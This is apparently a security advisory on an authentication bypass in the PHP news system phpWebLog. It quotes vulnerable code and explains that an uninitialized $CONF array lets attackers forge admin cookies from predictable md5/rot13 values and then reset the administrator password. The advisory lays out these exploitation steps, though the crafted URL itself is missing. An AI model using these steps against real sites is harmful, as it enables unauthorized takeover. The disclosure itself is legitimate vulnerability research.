phpWebLog is a complete web news management system written in PHP. A vulnerability in the product enables remote attackers to bypass the administrative authentication protection used to limit the access to a few of the provided privileged functions.
Credit:
The information has been provided by Jo?o Gouveia.
In common.inc.php, $CONF is not properly initialized as an array; this allows users to alter the contents stored inside it. The alteration of the content allows attackers to bypass the administrative authentication.
Technical details:
The following is the vulnerable parts of the code:
snip of common.inc.php:
<quote>
/*== read in configuration data ==*/
$sql = "SELECT * FROM T_Config";
$result = @mysql_query($sql,$db);
$nrows = mysql_num_rows($result);
$CONF is not being properly initialized as an array, so if we fill $CONF with user-submited data, all the array values will revert to the first character in the last position. The last position is "language", therefore, if our language is set to "english" all values of $CONF will revert to 'e'.
snip of common.inc.php:
<quote>
function F_isAdmin() {
global $HTTP_COOKIE_VARS,$CONF;
$name = md5($CONF["SiteKey"] . "_admin");
#echo $HTTP_COOKIE_VARS[$name];
#echo crypt("admin",$CONF["SiteKey"]);
return ($HTTP_COOKIE_VARS[$name]==md5(rot13($CONF["SiteKey"])) ? 1 :
0);
}
</quote>
As we can see here, authentication is based on matching data with $CONF values, so all we need to do is:
Calculate md5() of "<first char of language>_admin".
Calculate md5(rot13("<first char of language>"))
snip of submit.php:
<quote>
case "config-extend":
$tmp = urlencode("Changes Saved.");
if (!empty($Passwd) || !empty($Passwd2)) {
if ($HTTP_POST_VARS["Passwd"]==$HTTP_POST_VARS["Passwd2"]) {
$sql = "UPDATE T_Config set ";
$sql .= "Value = '" .
md5($HTTP_POST_VARS["Passwd"]) . "' ";
$sql .=
"WHERE Name = 'Passwd'";
$RET = @mysql_query($sql,$db);
(...)
(admin password changed)
</quote>
With the calculations obtained above, we'll submit the following URL (based on English configuration):
You can simply ignore possible PHP errors. After the URL has been submitted, you can just go to the admin area and set a new administrative password.
Assigning values to HTTP_*_VARS like in the above example, will only work in PHP versions below 4.0 rc1. Still, any user can submit this same values using other methods, achieving the same results.
Of course, all of this is based on the idea that the administrator changed the SiteKey value, which is by default "phpWebLog". Obvious this value should be changed. If it wasn't changed, calculate the HTTP_COOKIE_VARS values based on "phpWebLog" instead of 'e'.
